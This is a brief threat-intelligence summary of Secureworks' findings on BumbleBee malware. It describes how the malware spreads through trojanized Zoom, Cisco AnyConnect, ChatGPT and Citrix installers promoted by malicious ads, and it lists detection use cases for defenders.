BumbleBee Malware Found in Disguised Software

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Secureworks

To facilitate the distribution of malicious malware through Google Ads or SEO poisoning, threat actors often employ a popular tactic of pairing wanted content with unwanted content. Secureworks' analysis revealed BumbleBee malware is being spread through "trojanized installers for popular software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace." This campaign was observed since February 16th, 2023, with the identification of a fictitious Cisco AnyConnect download page. "An infection chain that began with a malicious Google Ad sent the user to this fake download page via a compromised WordPress site," said Secureworks.

After the trojanized software is downloaded, a legitimate version of the software is installed through an MSI installer file. However, the installation also initiates a malicious PowerShell script that loads the BumbleBee malware into memory. With the modular nature of BumbleBee, it's capable of being used to download additional payloads for data collection and ransomware. An intrusion observed by Secureworks saw threat actors downloading remote access software three hours after initial access was obtained to move laterally, collect system data and credentials, and ultimately deploy ransomware.

Anvilogic Scenario:

• Malicious Software Download via MSI/JS

Anvilogic Use Cases:

• MSIExec Install MSI File
• Executable Create Script Process
• Known Malicious PowerShell Cmdlet

‍